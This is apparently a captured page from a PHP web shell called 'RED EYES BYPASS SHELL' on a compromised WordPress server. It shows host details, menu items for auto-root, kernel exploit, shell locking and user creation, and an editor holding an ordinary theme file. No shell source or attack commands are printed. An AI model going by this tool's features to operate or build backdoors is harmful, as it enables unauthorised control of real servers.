Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
inc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
customizer
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
class-bnm-meta-boxes.php
4.94
KB
-rwxr-xr-x
class-bnm-nav-walker.php
5.18
KB
-rwxr-xr-x
class-bnm-svg-icons.php
45.14
KB
-rwxr-xr-x
css-output.php
19.86
KB
-rwxr-xr-x
custom-header.php
2.71
KB
-rwxr-xr-x
template-functions.php
15.29
KB
-rwxr-xr-x
template-tags.php
13.13
KB
-rwxr-xr-x
typography.php
4.56
KB
-rwxr-xr-x
wptt-webfont-loader.php
17.35
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-bnm-meta-boxes.php
<?php /** * Calls the class on the post edit screen. */ function bnm_metaboxes_call() { new BNM_Metaboxes(); } if ( is_admin() ) { add_action( 'load-post.php', 'bnm_metaboxes_call' ); add_action( 'load-post-new.php', 'bnm_metaboxes_call' ); } /** * Adds a Layout select meta box to posts and pages. */ class BNM_Metaboxes { /** * Hook into the appropriate actions when the class is constructed. */ public function __construct() { add_action( 'add_meta_boxes', array( $this, 'add_meta_box' ) ); add_action( 'save_post', array( $this, 'save' ) ); } /** * Adds the meta box container. */ public function add_meta_box( $post_type ) { // Limit meta box to certain post types. $post_types = array( 'post', 'page' ); if ( in_array( $post_type, $post_types ) ) { add_meta_box( 'bnm_layout_meta', esc_html__( 'Select Layout', 'bnm' ), array( $this, 'render_meta_box_content' ), $post_type, 'side', 'default' ); } } /** * Save the meta when the post is saved. * * @param int $post_id The ID of the post being saved. */ public function save( $post_id ) { /* * We need to verify this came from the our screen and with proper authorization, * because save_post can be triggered at other times. */ // Check if our nonce is set. if ( ! isset( $_POST['bnm_layout_metabox_nonce'] ) ) { return $post_id; } $nonce = sanitize_key( $_POST['bnm_layout_metabox_nonce'] ); // Verify that the nonce is valid. if ( ! wp_verify_nonce( $nonce, 'bnm_layout_metabox' ) ) { return $post_id; } /* * If this is an autosave, our form has not been submitted, * so we don't want to do anything. */ if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) { return $post_id; } // Check the user's permissions. if ( isset( $_POST['post_type'] ) && 'page' == $_POST['post_type'] ) { if ( ! current_user_can( 'edit_page', $post_id ) ) { return $post_id; } } else { if ( ! current_user_can( 'edit_post', $post_id ) ) { return $post_id; } } /* OK, it's safe for us to save the data now. */ if ( isset( $_POST['bnm_layout'] ) ) { // Sanitize the user input. $selected_layout = sanitize_text_field( wp_unslash( $_POST['bnm_layout'] ) ); // Update the meta field. update_post_meta( $post_id, '_bnm_layout_meta', $selected_layout ); } else { return $post_id; } } /** * Render Meta Box content. * * @param WP_Post $post The post object. */ public function render_meta_box_content( $post ) { // Add an nonce field so we can check for it later. wp_nonce_field( 'bnm_layout_metabox', 'bnm_layout_metabox_nonce' ); // Use get_post_meta to retrieve an existing value from the database. $selected_layout = get_post_meta( $post->ID, '_bnm_layout_meta', true ); // Display the form, using the current value. if( empty( $selected_layout) ) { $selected_layout = 'default-layout'; } ?> <input type="radio" id="default-layout" name="bnm_layout" value="default-layout" <?php checked( 'default-layout', $selected_layout ); ?> /> <label for="default-layout" class="post-format-icon"><?php esc_html_e( 'Default Layout', 'bnm' ); ?></label><br/> <input type="radio" id="right-sidebar" name="bnm_layout" value="right-sidebar" <?php checked( 'right-sidebar', $selected_layout ); ?> /> <label for="right-sidebar" class="post-format-icon"><?php esc_html_e( 'Right Sidebar', 'bnm' ); ?></label><br/> <input type="radio" id="left-sidebar" name="bnm_layout" value="left-sidebar" <?php checked( 'left-sidebar', $selected_layout ); ?> /> <label for="left-sidebar" class="post-format-icon"><?php esc_html_e( 'Left Sidebar', 'bnm' ); ?></label><br/> <input type="radio" id="no-sidebar" name="bnm_layout" value="no-sidebar" <?php checked( 'no-sidebar', $selected_layout ); ?> /> <label for="no-sidebar" class="post-format-icon"><?php esc_html_e( 'Full Width', 'bnm' ); ?></label><br/> <input type="radio" id="center-content" name="bnm_layout" value="center-content" <?php checked( 'center-content', $selected_layout ); ?> /> <label for="center-content" class="post-format-icon"><?php esc_html_e( 'Full Width Content Centered.', 'bnm' ); ?></label><br/> <?php } }
Close